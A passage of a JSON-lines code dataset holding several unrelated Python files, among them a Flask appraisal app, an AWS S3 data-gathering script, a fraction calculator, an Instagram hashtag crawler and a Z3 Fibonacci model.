1\n\nwhile indexV2 <= len(scoreLst):\n v2Score += scoreLst[indexV2]\n indexV2 += 1\n if indexV1 >= len(scoreLst):\n break\n v2Score += scoreLst[indexV2]\n indexV2 += 2\n\nprint(max(v1Score, v2Score))\n","repo_name":"FrancisJeon/Baekjoon-python","sub_path":"ing/BOJ_2579.py","file_name":"BOJ_2579.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"20517576017","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 25 10:59:17 2020\r\n\r\n@author: sandhya chettiar\r\n\"\"\"\r\n\r\nfrom skimage import data\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n#Image reading\r\n\r\nimg = data.text()\r\nplt.gray()\r\n\r\n\r\nm, n = img.shape\r\n\r\nmask = [[1,2,1],\r\n [2,4,2],\r\n [1,2,2]]\r\nmask = np.array(mask)\r\n\r\nmask = mask/16\r\n\r\n\r\nimg_new = np.zeros([m, n])\r\n\r\nfor i in range(1,m-1):\r\n for j in range(1,n-1):\r\n temp = img[i-1,j-1]*mask[2-0,2-0] + img[i-1,j]*mask[2-0,2-1] + img[i-1,j+1]*mask[2-0,2-2] + img[i,j-1]*mask[2-1,2-0] + img[i,j]*mask[2-1,2-1] + img[i,j+1]*mask[2-1,2-2] + img[i+1,j-1]*mask[2-2,2-0] + img[i+1,j]*mask[2-2,2-1] +img[i+1,j+1]*mask[2-2,2-2]\r\n\r\n img_new[i,j] = temp\r\n \r\n\r\n\r\nimg_new = img_new.astype(np.uint8)\r\nplt.figure(1)\r\nplt.subplot(1,2,1)\r\nplt.imshow(img)\r\n\r\nplt.subplot(1,2,2)\r\nplt.imshow(img_new)\r\n\r\nplt.show()\r\n","repo_name":"Sandhya18Chettiar/Digital-Image-Processing-Lab","sub_path":"gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"2229732009","text":"#coding: utf-8\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport os\n\nfrom .settings_base import *\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.environ['DATABASE_NAME'],\n 'USER': os.environ['DATABASE_USERNAME'],\n 'PASSWORD': os.environ['DATABASE_PASSWORD'],\n 'HOST': os.environ['DATABASE_HOST'],\n }\n}\n\nEMAIL_HOST = 'smtp.yandex.ru'\nEMAIL_HOST_USER = 'noreply@erofeimarkov.ru'\nEMAIL_HOST_PASSWORD = os.environ['SMTP_PASSWORD']\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n\nDEBUG = False\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'verbose': {\n 'format': '%(asctime)s PID#%(process)d [%(levelname)s] %(name)s: %(message)s at %(pathname)s line %(lineno)d'\n },\n },\n 'handlers': {\n 'default': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'filename': '/var/log/uwsgi/django.log',\n 'formatter': 'verbose',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['default'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n '': {\n 'handlers': ['default'],\n 'level': 'DEBUG',\n },\n },\n}\n","repo_name":"migunow/erofeimarkov","sub_path":"app/erofeimarkov/settings_prod.py","file_name":"settings_prod.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1491214083","text":"from unittest import mock\n\nimport pandas as pd\nimport pytest\n\nfrom metadata.core import Metadata\nfrom pipeline_dataops.extract.core import from_api\n\n\n@pytest.fixture\ndef mocked_requests():\n with mock.patch(\"requests.get\") as mock_get:\n yield mock_get\n\n\n@pytest.mark.skip(\n reason=\"\"\"\n Not implemented yet.\n This test, 'test_from_api', is an integration test because it tests\n the interaction between the 'from_api' function and the actual API endpoint.\n It checks if the function correctly handles responses from the API and\n properly processes the raw data. Therefore, it involves the integration\n of multiple components of the system, and not just the behavior of\n individual units in isolation.\n \"\"\"\n)\ndef test_from_api(sample_raw_df):\n assert True\n","repo_name":"gao-hongnan/TheBareOps","sub_path":"pipeline-dataops/tests/integration/extract/test_extract.py","file_name":"test_extract.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"1783654694","text":"from flask import Flask, request, jsonify, abort, redirect, url_for, render_template, send_file, flash\nfrom bs4 import BeautifulSoup\nimport requests, statistics\nimport openpyxl\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, FileField\nfrom wtforms.validators import DataRequired\nimport os\nfrom werkzeug.utils import secure_filename\nimport auto\nimport json\n\napp = Flask(__name__, static_url_path='/static')\n\napp.config.update(dict(\n SECRET_KEY=\"powerful secretkey\",\n WTF_CSRF_SECRET_KEY=\"a csrf secret key\"\n))\n\n \n@app.route('/')\ndef redir_submit():\n return redirect(url_for('index'))\n\nclass MyForm(FlaskForm):\n # name = 'name'\n file = FileField(validators=[DataRequired()]\n )\n# @app.route('/index', methods=['GET', 'POST'])\n# def form():\n\n# #Причем в начале проверяем наличие авторизации, если флага нет, то кидаем обработку 401 ошибки и не даем работать с прогой\n# # if not session.get('logged_in'):\n# # abort(401)\n\n# \"\"\"\n# Тут делаем что-то полезное в случае успешной авторизации\n# \"\"\"\n\n# return render_template('index.html')\n\n\n@app.route('/submit', methods=('GET', 'POST'))\ndef submit():\n form = MyForm()\n \n if form.validate_on_submit():\n f = form.file.data\n filename = 'analogi.xlsx'\n f.save(os.path.join(filename))\n auto.autoru_appraiser(filename)\n \n\n return send_file(filename,\n mimetype='xlsx',\n # attachment_filename=filename,\n as_attachment=True)\n \n return render_template('submit.html', form=form)\n\n\n@app.errorhandler(500)\ndef page_not_found(e):\n error = 'Произошла ошибка при работе скрипта, вероятно auto.ru опять показывает капчу. Сообщите об этом Алексею прямо сейчас.'\n return render_template('index.html', error=error), 500\n\n\ndef get_dropdown_values():\n\n \"\"\"\n dummy function, replace with e.g. database call. If data not change, this function is not needed but dictionary\n could be defined globally\n \"\"\"\n with open('marks_and_models.json', 'r', encoding='utf-8') as fh: #открываем файл на чтение\n class_entry_relations = json.load(fh)\n\n return class_entry_relations\n\n\n@app.route('/_update_dropdown')\ndef update_dropdown():\n\n # the value of the first dropdown (selected by the user)\n selected_class = request.args.get('selected_class', type=str)\n\n # get values for the second dropdown\n updated_values = get_dropdown_values()[selected_class]\n\n # create the value sin the dropdown as a html string\n html_string_selected = ''\n for entry in updated_values:\n html_string_selected += ''.format(entry, entry)\n\n return jsonify(html_string_selected=html_string_selected)\n\n\n@app.route('/_process_data')\ndef process_data():\n selected_class = request.args.get('selected_class', type=str)\n selected_entry = request.args.get('selected_entry', type=str)\n\n # process the two selected values here and return the response; here we just create a dummy string\n\n return jsonify(random_text=\"you selected {} and {}\".format(selected_class, selected_entry))\n\n\n@app.route('/index', methods=('GET', 'POST'))\ndef index():\n\n \"\"\"\n Initialize the dropdown menues\n \"\"\"\n form = MyForm()\n \n if request.method == 'POST':\n filename = 'shablon.xlsx'\n f = openpyxl.load_workbook(filename)\n sheetobject = f['Объекты оценки']\n sheetobject.cell(row=2, column=1).value = request.form['all_classes']\n sheetobject.cell(row=2, column=2).value = request.form['all_entries']\n sheetobject.cell(row=2, column=3).value = request.form['obj_year']\n sheetobject.cell(row=2, column=4).value = request.form['obj_engvol']\n sheetobject.cell(row=2, column=5).value = request.form['obj_hp']\n sheetobject.cell(row=2, column=9).value = request.form['obj_kpp']\n sheetobject.cell(row=2, column=7).value = request.form['obj_gear']\n sheetobject.cell(row=2, column=6).value = request.form['obj_eng']\n sheetobject.cell(row=2, column=8).value = request.form['obj_tob']\n sheetobject.cell(row=2, column=11).value = request.form['obj_mileage']\n filename = 'analogi.xlsx'\n \n f.save(os.path.join(filename))\n \n auto.autoru_appraiser(filename)\n \n\n return send_file(filename,\n mimetype='xlsx',\n # attachment_filename=filename,\n as_attachment=True)\n\n class_entry_relations = get_dropdown_values()\n\n default_classes = sorted(class_entry_relations.keys())\n default_values = class_entry_relations[default_classes[0]]\n\n return render_template('index.html',\n all_classes=default_classes,\n all_entries=default_values)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"DemalexS/appreser","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"4615108400","text":"import re\nimport subprocess\n\n\nbucket_path = \"s3://zapata-zmachine/projects/bp-combustion-project/phase-2/mpea-runtime/data/publication-data/cisd_rdms/\"\naws_profile = \"--profile zapata-zmachine\"\nls_cmd = \"aws s3 ls \"\ncp_cmd = \"aws s3 cp \"\nuntar_cmd = \"tar zxvf \"\ntar_cmd = \"tar zcvf \"\n\n\ndef compress_and_upload(target, result, path=None):\n \"\"\"Little function to compress a file with tar zcvf and\n upload it to amazon with path appended to the bucket_path\n Args:\n target: the path of the target file to compress and upload\n result: the path where to store the compressed file\n path: Optionally, the subfolder where to upload the file in the\n S3 bucket\n \"\"\"\n\n compress_cmd = tar_cmd + result + \" \" + target\n print(compress_cmd)\n subprocess.check_output(compress_cmd, shell=True)\n\n upload_cmd = cp_cmd + result + \" \" + bucket_path + path + \" \" + aws_profile\n print(upload_cmd)\n subprocess.check_output(upload_cmd, shell=True)\n\n\ndef download_and_uncompress(target):\n \"\"\"Little function to download a file from AWS S3\n and uncompress it with tar zxvf.\n Args:\n target: The path to append to the bucket path to get the file\n \"\"\"\n\n download_cmd = cp_cmd + bucket_path + target + \" . \" + aws_profile\n print(download_cmd)\n subprocess.check_output(download_cmd, shell=True)\n\n filename = re.sub(r\".*/\", \"\", target)\n\n uncompress_cmd = untar_cmd + filename\n print(uncompress_cmd)\n subprocess.check_output(uncompress_cmd, shell=True)\n\n\n# @profile\ndef main():\n\n mol_search = re.compile(\".*molecule: '([A-Z0-9]*)'\")\n act_search = re.compile(\".*nactiveorbs: '([A-Z0-9]*)'\")\n type_search = re.compile(\".*orb-type: '([ A-Za-z0-9]*)'\")\n path_search = re.compile(\".*hamiltonian: '([^']*)'\")\n missing_rdms = set()\n found_rdms = set()\n n_rdms = 0\n with open(\"hamiltonian_data\", \"r\") as f:\n for line in f:\n match_mol = mol_search.search(line)\n match_act = act_search.search(line)\n match_type = type_search.search(line)\n if match_type:\n n_rdms += 1\n molname = match_mol.group(1)\n nactiveorbs = match_act.group(1)\n orbtype = match_type.group(1)\n\n if orbtype == \"MP2 NOs\":\n orbtype = \"NOs\"\n newname = molname + \"-\" + nactiveorbs + \"-\" + orbtype + \"-cisd-rdm.tgz\"\n\n ham_path = path_search.search(line).group(1)\n print(ham_path)\n folder_path = re.sub(\"hamiltonian.tgz\", \"\", ham_path)\n ls_folder = subprocess.check_output(\n ls_cmd + \"s3://zapata-zmachine/\" + folder_path + \" \" + aws_profile,\n shell=True,\n )\n if \"cisd-rdm\" not in str(ls_folder):\n print(f\"CISD RDM missing for {molname}, {nactiveorbs}, {orbtype}.\")\n missing_rdms.add(newname)\n else:\n found_rdms.add(newname)\n cisd_cp_cmd = (\n \"aws s3api copy-object --copy-source \"\n + \"zapata-zmachine/\"\n + folder_path\n + \"cisd-rdms.tgz\"\n + \" --bucket zapata-zmachine --key projects/bp-combustion-project/phase-2/mpea-runtime/data/publication-data/cisd_rdms/\"\n + newname\n + \" \"\n + aws_profile\n )\n cp_output = subprocess.check_output(cisd_cp_cmd, shell=True)\n\n assert len(missing_rdms) + len(found_rdms) == n_rdms\n print(\"The missing RDMs are:\")\n print(missing_rdms)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yannnbingz/madtequila-benchmark","sub_path":"grouping_data/Gather_CISD_RDMs.py","file_name":"Gather_CISD_RDMs.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"19469030160","text":"#This method goes through the string and returns the index of the nextOperand.\n#If there isn't another operand None is returned\ndef findNextOperand(string):\n for i in range (0, len(string)):\n if isOperand(string[i]):\n return i\n#This method finds the end of a segment. A segment is defined as one number, fraction, or mixed number\n#so it just finds the index of the first segment breaker (anything in the string terminators). If one \n#is not found the length of the string is returned.\ndef findSegmentEnd(string):\n terminators = '+-/*^()'\n for i in range (0, len(string)):\n if string[i] in terminators:\n return i\n return len(string)\n#This finds the end of segment in a similar manor to findSegmentEnd, but it is used before spaces are removed\n#so spaces are considered a segment breaker. However, in a mixed number a space is mandatory so it determines\n#if the space is just part of a mixed number to prevent false positives. If there is no segment end in the string\n#the length of the string is returned.\ndef findSegmentEndWithSpaces(string):\n terminators = '+-/*^() '\n for i in range (0, len(string)):\n if string[i] in terminators:\n if(string[i] == \" \"):\n if followedByFraction(string[i+1:]):\n return i\n else:\n return i\n\n return len(string)\n\n#This method determines if before the next operator or parentheses there is a \\ indicating a fraction. \n#This is used to ensure spaces are not removed that belong to a mixed number.\ndef followedByFraction(string):\n terminators = '+-/*^() '\n for i in range (0, len(string)):\n if string[i] in terminators:\n return False\n elif string[i] == \"\\\\\":\n return True\n return False\n\n#This method goes through the string and converts all negatives into (0-negative) to make the string parsing\n#of converting into custom classes simpler.\ndef fixNegatives(string):\n newString = \"\"\n forValue = 0\n if string[0] == \"-\":\n newString += \"(0-\"\n indexOfNumberEnd = findSegmentEndWithSpaces(string[1:]) + 1\n portion = string[1:indexOfNumberEnd]\n newString += portion\n newString += \")\"\n forValue = indexOfNumberEnd\n while forValue < len(string) :\n if (string[forValue] == \" \" or string[forValue] == \"(\") and string[forValue+1] == \"-\" and (isNumber(string[forValue + 2]) or string[forValue+2] == \".\"):\n if(string[forValue] == \"(\"):\n newString += \"(\"\n indexOfTermEnd = findSegmentEndWithSpaces(string[forValue+2:]) + forValue + 2\n term = string[forValue+2:indexOfTermEnd]\n newString = newString + \"(0-\" + term + \")\"\n forValue = indexOfTermEnd\n else:\n newString += string[forValue]\n forValue += 1\n return newString\n\n\n#This method goes through the string and removes any spaces unless it is followed by a fraction and that spaces is necessary.\n#This is to make the string parsing of converting terms into a custom class simpler.\ndef removeSpaces(string):\n newString = \"\"\n for i in range (0, len(string)):\n if string[i] != \" \":\n newString += string[i]\n else:\n if (isOperand(string[i-1]) == False and followedByFraction(string[i+1:])):\n newString += string[i]\n return newString\n\n#This method goes through the entire expression and converts it into the form \"fracList[0] operator fracList[1]...\". This is so\n#eval can be called on the expression even though it has fractions and mixed numbers. It does this by building a new String keeping\n#operators, parentheses, and converting the terms into a custom class and appending it onto fracList.\ndef fractionalize(expression):\n lastIndex = 0\n alreadyConverted = \"\"\n segmentEnd = 0\n fracList = []\n #Append first\n indexOfFirstOperand = findNextOperand(expression)\n subExpression = expression[:indexOfFirstOperand]\n for i in range (0, len(subExpression)):\n if subExpression[i] == \"(\" or subExpression[i] == \")\":\n alreadyConverted += subExpression[i]\n else:\n segmentEnd = findSegmentEnd(expression[i:]) + i\n firstTerm = subExpression[i:segmentEnd]\n fractionVersion = convertToFraction(firstTerm)\n fracList.append(fractionVersion)\n alreadyConverted += \"fracList[\" + str(len(fracList) - 1) + \"]\"\n break\n\n #Continue on with the rest of the expression\n for x in range (segmentEnd, len(expression)):\n if expression[x] == \")\":\n alreadyConverted += expression[x]\n elif isOperand(expression[x]):\n if (expression[x] == \"^\"):\n alreadyConverted += \"**\"\n else:\n alreadyConverted += expression[x]\n while ( expression[x+1] == \"(\" or expression[x+1] == \")\" ):\n alreadyConverted += expression[x+1]\n x+=1\n x+=1\n segmentEnd = findSegmentEnd(expression[x + 1:])\n term = expression[x:segmentEnd + x + 1]\n fractionVersion = convertToFraction(term)\n fracList.append(fractionVersion)\n alreadyConverted += \"fracList[\" + str(len(fracList) - 1) + \"]\"\n return alreadyConverted, fracList\n\n\n#This method determines if something is a number. If it is, True is returned. If not, False is returned. This is used in ConvertToFraction\ndef isNumber(string):\n try:\n float(string)\n return True\n except ValueError :\n return False\n\n\n#This method takes a String and converts it into either a decimal or fraction. If the term is a mixed number\n#this method will convert that into an impromper fraction.\ndef convertToFraction(string):\n if isNumber(string):\n \treturn decimal(float(string))\n elif \" \" in string:\n separator = string.find(\" \")\n numberPart = float(string[:separator])\n fractionPart = string[separator + 1 :]\n separator = fractionPart.find(\"\\\\\")\n numerator = float(fractionPart[:separator])\n denominator = float(fractionPart[separator + 1:])\n return fraction(numerator + numberPart * denominator, denominator)\n else:\n separator = string.find(\"\\\\\")\n numerator = float(string[:separator])\n denominator = float(string[separator + 1:])\n return fraction(numerator, denominator)\n\n#This method returns true if a character is an operator and false if it isn't\ndef isOperand(char):\n operands = '+-/*^'\n return char in operands\n\n#This method uses Euclids algorithim to find the GCD of two numbers.\ndef gcd (a , b) :\n a = float(a)\n b = float(b)\n if a == 0:\n return b\n else:\n return gcd(b % a, a)\n\n#This method finds the least common multiple by multipling the two numbers together (guaranteed to be a multiple)\n#and dividing that product by the gcd.\ndef lcm(a, b):\n return a * b / gcd(a,b)\n\n'''\nThe fraction class is used to hold both mixed numbers and fractions. Mixed numbers are stored as impromper fractions.\nThis class overides the standard operators, the toString method, the float method, and has a the helper methods simplifyToMixedNumber, \nsimplify, and reciprocal. \n'''\nclass fraction :\n\t#The constructor just takes the given parameters (numerator and denominator) and\n\t#sets the proper values within the class\n def __init__(self , Numerator=0, Denominator=1) :\n self.numerator = Numerator\n self.denominator = Denominator\n #This method returns a string representation of the fraction. It first simpifies the fraction (part of simplifytoMixedNumber)\n #and if possible converts it into a mixed number. It then returns the fraction in the form A B\\C, but if A is 0 it just returns B\\C\n #and if B is 0 it just returns A.\n def __str__(self) :\n if(self.denominator == 0):\n return \"Please Do Not Divide By Zero\"\n simplified = self.simplifyToMixedNumber()\n frac = simplified[1]\n if simplified[0] == 0:\n return str(simplified[1].numerator) + \"\\\\\" + str(simplified[1].denominator)\n elif simplified[1].numerator == 0 :\n return str(simplified[0])\n else:\n return str(simplified[0]) + \" \" + str(simplified[1].numerator) + \"\\\\\" + str(simplified[1].denominator)\n #This method returns a fraction of the product of the two given fractions.\n def __mul__(self , other) :\n product = fraction(self.numerator*other.numerator , self.denominator*other.denominator)\n return product\n #This method gets a float aproximation of the fraction by dividing the numerator by the denominator.\n def __float__(self) :\n return float(self.numerator)/self.denominator\n #This method gets the reciporcal by simplify flipping the numerator and denominator\n def reciprocal(self) :\n inverse = fraction(self.denominator , self.numerator)\n return inverse\n \t#This method subtracts two fractions by first putting them over a common denominator then subtracting. It returns\n \t#a fraction.\n def __sub__(self, other):\n leastCommonMultiple = lcm(self.denominator, other.denominator)\n fracOne = fraction((self.numerator) * (leastCommonMultiple / (self.denominator)) , leastCommonMultiple)\n fracTwo = fraction((other.numerator) * (leastCommonMultiple / other.denominator), leastCommonMultiple)\n return fraction(fracOne.numerator - fracTwo.numerator, leastCommonMultiple)\n #This method adds two fractions by first putting them over a common denominator then adding. It returns\n \t#a fraction.\n def __add__ (self, other):\n leastCommonMultiple = lcm(self.denominator, other.denominator)\n fracOne = fraction((self.numerator) * (leastCommonMultiple / (self.denominator)) , leastCommonMultiple)\n fracTwo = fraction((other.numerator) * (leastCommonMultiple / other.denominator), leastCommonMultiple)\n return fraction(fracOne.numerator + fracTwo.numerator , leastCommonMultiple)\n #This method divides two fractions by returning the product of the first fraction and the reciprocal of the second\n def __truediv__(self, other):\n recip = fraction(other.denominator, other.numerator)\n return self * recip\n #This method handles fractional exponents. It first determines if the given radical is invalid throwing an invalidRadical exception.\n #If not then it solves the fractional exponent. If the output is a decimal value it returns a decimal to make things clear for the user.\n def __pow__ (self, power):\n if float(self) < 0 and float(power) % 2 == 0:\n raise invalidRadical\n if float(power) >= 0:\n partOne = fraction(self.numerator ** (1/power.denominator), self.denominator ** (1/power.denominator))\n partTwo = fraction(partOne.numerator ** power.numerator, partOne.denominator ** power.numerator)\n if(float.is_integer(partTwo.numerator) and float.is_integer(partTwo.numerator)):\n return partTwo\n else:\n return decimal(float(partTwo))\n else:\n power = abs(power)\n partOne = fraction(self.numerator ** power.demoninator, self.denominator ** power.demoninator)\n partTwo = fraction(partOne.numerator ** (1/power.numerator), partOne.demoniator ** (1/power.numerator))\n return fraction.reciprocal(partTwo)\n #This method simplifies a fraction to the lowest possible numerator and denominator.\n def simplify(self):\n if(self.numerator == 0):\n return fraction(0, 1)\n else:\n greatestCommonDemoniator = gcd(self.numerator, self.denominator)\n return fraction(self.numerator / greatestCommonDemoniator, self.denominator / greatestCommonDemoniator)\n #This method converts a fraction into a mixed number with the fraction portion in simplest terms. It returns\n #a tuple of the preceeding number and the fraction.\n def simplifyToMixedNumber(self):\n if self.numerator >= self.denominator:\n numberPart = int(self.numerator / self.denominator)\n remainder = self - fraction(numberPart, 1)\n return numberPart , remainder.simplify()\n return 0, self.simplify()\n\n#This method takes in a number and finds the length of its mantessa by determining the length\n#of its string version after the period.\ndef lenMantessa (number):\n stringVersion = str(number)\n indexOfDecimal = stringVersion.find(\".\")\n return len(stringVersion[indexOfDecimal + 1:])\n'''\nThe custom class decimal inherits from fraction and is used for non-fraction/mixed number entries.\nThe purpose of this is such that all decimals are compatible with fractions (so an error isn't called\nwhen doing an operation on a fraction and a decimal). As well because a custom class is used custome exceptions\ncan be thrown such as the invalidRadical. \n'''\nclass decimal (fraction):\n\t#The constructor in essence converts each decimal into a fraction that has a numerator and denominator. \n\t#However, by using a custom class instead of just making every decimal fraction the toString can output\n\t#a more appropriate result. This method works by finding the length of the mantissa, multipling the decimal\n\t# times 10 ^ (length of mantessa) and making the denominator 10 ^ length of the mantissa. The fraction is then simplified.\n def __init__(self, numerator=0):\n length = lenMantessa(numerator)\n newNumerator = numerator * 10 ** length\n denominator = 10 ** length\n greatestCommonDemoniator = abs(gcd(newNumerator, denominator))\n fraction.__init__(self, newNumerator / greatestCommonDemoniator, denominator / greatestCommonDemoniator)\n #toString method which just returns a string of the float value of each decimal.\n def __str__(self):\n decimalValue = self.numerator / self.denominator\n return str(decimalValue)\n #If one of the items is a fraction it calls the fraction class's mulitplication method to correct typing errors and \n #provide the proper output, if not the float values of each decimal are multiplied together\n def __mul__(self, other):\n if type(other) == type(fraction()):\n return fraction.__mul__(self, other)\n else:\n fractionOne = float(self)\n fractionTwo = float(other)\n return decimal(fractionOne * fractionTwo)\n #If one of the items is a fraction it calls the fraction class's subtractaction method to correct typing errors and \n #provide the proper output, if not the float values of each decimal are subtracted together\n def __sub__(self, other):\n if type(other) == type(fraction()):\n return fraction.__sub__(self, other)\n else:\n fractionOne = float(self)\n fractionTwo = float(other)\n return decimal(fractionOne - fractionTwo)\n #If one of the items is a fraction it calls the fraction class's addition method to correct typing errors and \n #provide the proper output, if not the float values of each decimal are added together\n def __add__(self, other):\n if type(other) == type(fraction()):\n return fraction.__add__(self, other)\n else:\n fractionOne = float(self)\n fractionTwo = float(other)\n return decimal(fractionOne + fractionTwo)\n #If one of the items is a fraction it calls the fraction class's division method to correct typing errors and \n #provide the proper output, if not the float values of each decimal are divided.\n def __truediv__(self, other):\n if type(other) == type(fraction()):\n return fraction.__truediv__(self, other)\n else:\n fractionOne = float(self)\n fractionTwo = float(other)\n return decimal(fractionOne / fractionTwo)\n #If one of the items is a fraction it calls the fraction class's division method to correct typing errors and \n #provide the proper output, if not the method checks to see if there is an invalid radical and if there isn't\n #takes float value of the number to power of the float value of the other. If there is an invalid radical\n #an exception is thrown.\n def __pow__(self, power):\n if type(power) == type(fraction()):\n return fraction.__pow__(self, power)\n else:\n fractionOne = float(self)\n powerDecimal = float(power)\n if decimal(power).denominator %2 == 0 and fractionOne < 0:\n raise invalidRadical\n else:\n return decimal(fractionOne ** powerDecimal)\n\n\n#If a radical is invalid such as -2 ^ 1\\2 then this exception is thrown.\n#A custom exception is used to properly give an error message to the user.\nclass invalidRadical (Exception):\n pass\n\n'''\nThis method handles the entire programs control flow. It runs a loop that takes in inputs, readies them\nfor evaluation, evaluates, then repeats. If an error arises then the method prints out an error messgae\ninforming the user as to avoid any crashes. The main loop only concludes when the user enters\nthe keyword 'done' (case insensitive)\n'''\ndef main():\n print(\"At any point to end the session please enter \\'done\\'\")\n while True:\n expression = input(\"Please Enter An Expression: \")\n if expression != None and expression != \"\":\n if(expression.lower() == \"done\"):\n print (\"Session Concluded\")\n break\n else:\n try:\n expression = fixNegatives(expression)\n expression = removeSpaces(expression)\n fractionalized = fractionalize(expression)\n expressionAsString = fractionalized[0]\n fracList = fractionalized[1]\n except:\n print (\"The syntax behind your expression is invalid. Please refer to the Readme file.\")\n continue\n try:\n evaluate = eval(expressionAsString)\n print(evaluate)\n except ZeroDivisionError:\n print (\"Please Don't Divide by Zero\")\n except invalidRadical:\n print(\"Invalid Radical\")\n except:\n print(\"Invalid Expression\")\n else:\n print (\"You didn't enter anything\")\n\n\n\nmain() #Start program\n\n","repo_name":"jasonscharff/ATCS-PythonCalculator","sub_path":"mainDoc.py","file_name":"mainDoc.py","file_ext":"py","file_size_in_byte":18463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"31446717923","text":"import json\nimport logging\nimport os\nimport time\n\nfrom instagram_selenium_crawler import Client, InstagramCommonCrawler, InstagramHashtagCrawler\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ntarget_hashtag = '###target_hashtag_without_sharp###'\nlogin_account_id = '###instagram_login_id###'\nlogin_account_pw = '###instagram_login_pw###'\n\ndirname = f'hashtag/{target_hashtag}/'\nfilename_prefix = f'{int(time.time())}_{target_hashtag}'\n\nos.makedirs(dirname, exist_ok=True)\n\nclient = Client(headless=False)\n\nnext_max_id = None\nnext_page = None\n\n# next_max_id=\"QVFBM21Bam5wdHNjM1V4R1dvMnNxYURONzRmbEdHTm5ucVlrcDc0QnEtS2RMRVN6UlkxTE5TcGtnbDNnN1JqXzlaWVh2RmNzQ1dHUWpLdzg4WnlFVk1mbg==\"\n# next_media_ids= [\n# \"2714711203075369621\",\n# \"2714740669070384594\"\n# ]\n# next_page=1672\n\n\ndef get_hashtag_posts(target_hashtag, next_max_id=None, next_media_ids=None, next_page=None):\n hashtag_json_str = hashtag.get_hashtag_posts(target_hashtag, next_max_id, next_media_ids, next_page)\n filename = f\"{dirname}{filename_prefix}_{next_page if next_page else 0}.json\"\n print(filename)\n\n with open(filename, 'w', newline='') as f:\n f.write(hashtag_json_str)\n\n hashtag_json = json.loads(hashtag_json_str)\n\n if next_max_id is None:\n next_max_id = hashtag_json['data']['recent']['next_max_id']\n next_page = hashtag_json['data']['recent']['next_page']\n next_media_ids = hashtag_json['data']['recent']['next_media_ids']\n else:\n next_max_id = hashtag_json['next_max_id']\n next_page = hashtag_json['next_page']\n next_media_ids = hashtag_json['next_media_ids']\n\n return hashtag_json, next_max_id, next_media_ids, next_page\n\n\ntry:\n login = InstagramCommonCrawler(client=client, logger=logger).login(login_account_id, login_account_pw)\n\n if login:\n hashtag = InstagramHashtagCrawler(client)\n\n if next_max_id is None:\n hashtag_json, next_max_id, next_media_ids, next_page = get_hashtag_posts(target_hashtag)\n\n while next_max_id is not None:\n time.sleep(2)\n\n hashtag_json, next_max_id, next_media_ids, next_page = get_hashtag_posts(target_hashtag, next_max_id,\n next_media_ids, next_page)\n\n logger.info(f\"next_max_id: {next_max_id}\")\n\n client.driver_quit()\n\nexcept Exception as e:\n logger.exception(f\"Failed to function {e}\")\n client.driver_quit()\n","repo_name":"kory-/instagram_selenium_crawler","sub_path":"sample/hashtag.py","file_name":"hashtag.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"6982870700","text":"#!/usr/bin/python -u\n# -*- coding: latin-1 -*-\n# \n# Fibonacci (bidirectional) in Z3\n# \n# This Z3 model was written by Hakan Kjellerstrand (hakank@gmail.com)\n# See also my Z3 page: http://hakank.org/z3/\n# \n# \nfrom z3 import *\n\n# From https://rise4fun.com/Z3/0pld:\n# \"\"\"\n# (declare-fun fib (Int) Int)\n# (assert (= 1 (fib 0)))\n# (assert (= 1 (fib 1)))\n# (assert (forall (x Int) (=> (>= x 2) (= (fib x) (+ (fib (- x 1)) (fib (- x 2)))))))\n# (assert (= 2 (fib 2)))\n# \"\"\"\n\nsol = Solver()\n\nmax_n = 31\n\n#\n# Note: One have to set a max limit on fib\n#\n# https://stackoverflow.com/questions/6915227/can-z3-check-the-satisfiability-of-formulas-that-contain-recursive-functions\n# Leonardo de Moura:\n# \"\"\"\n# The models produced by Z3 assign an interpretation for each uninterpreted function symbol. The models can\n# be viewed as functional programs. The current version does not produce recursive definitions.\n# The first example [Fibonacci] is satisfiable, but Z3 fails to produce an interpretation for fib because\n# it does not support recursive definitions. We have plans to extend Z3 in this direction.\n# \"\"\"\nfib = Function(\"fib\", IntSort(), IntSort())\nx = Int(\"x\")\n# sol.add(fib(0) == 1)\n# sol.add(fib(1) == 1)\n# sol.add(ForAll(x, Implies(And(x >= 2, x <= max_n), fib(x) == fib(x-1) + fib(x-2))))\n# Simpler:\nsol.add(ForAll(x, If(And(x >= 2, x <= max_n), fib(x) == fib(x-1) + fib(x-2), fib(x) == 1)))\n\n# sol.add(x == fib(2))\ny = Int(\"y\")\nz = Int(\"z\")\nsol.add(y>0, y <= max_n, z >0, z <= max_n)\n\nsol.add(10946 == fib(y))\nsol.add(2178309 == 